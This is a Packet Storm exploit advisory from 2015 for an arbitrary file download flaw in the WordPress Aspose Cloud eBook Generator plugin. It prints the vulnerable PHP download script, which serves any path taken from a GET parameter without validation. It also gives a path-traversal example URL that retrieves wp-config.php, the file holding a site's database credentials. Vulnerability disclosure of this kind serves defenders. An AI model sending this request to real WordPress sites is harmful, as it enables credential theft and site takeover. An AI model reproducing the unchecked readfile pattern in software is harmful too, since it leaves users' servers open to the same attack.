WordPress Aspose Cloud eBook Generator File Download

2015-03-26T00:00:00
ID PACKETSTORM:131040
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2015-03-26T00:00:00

Description

                                        
                                            `|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|  
|-------------------------------------------------------------------------|  
| [+] Exploit Title:Wordpress Aspose-Cloud-eBook-Generator Plugin   
Arbitrary File Download Vulnerability |  
| [+] Exploit Author: Ashiyane Digital Security Team |  
| [+] Vendor Homepage :   
https://wordpress.org/plugins/aspose-cloud-ebook-generator/  
| [+] Download Link :   
https://downloads.wordpress.org/plugin/aspose-cloud-ebook-generator.zip  
| [+] Tested on: Windows,Linux |  
| [+] Discovered By : ACC3SS  
|-------------------------------------------------------------------------|  
| [+] Exploit: |  
| [+] Vulnerable file :   
http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php   
|  
| [+] Vulnerable Code :  
  
<?php  
  
$file = $_GET['file'];  
  
$file_arr = explode('/',$file);  
  
$file_name = $file_arr[count($file_arr) - 1];  
  
header ("Content-type: octet/stream");  
  
header ("Content-disposition: attachment; filename=".$file_name.";");  
  
header("Content-Length: ".filesize($file));  
  
readfile($file);  
  
exit;  
  
?>  
  
| [+]   
http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=[File   
Address]  
| [+]  
| [+] Examples :   
http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php  
|-------------------------------------------------------------------------|  
|*||*||*||*||*||*||*||*||*||*||*||*||*  
`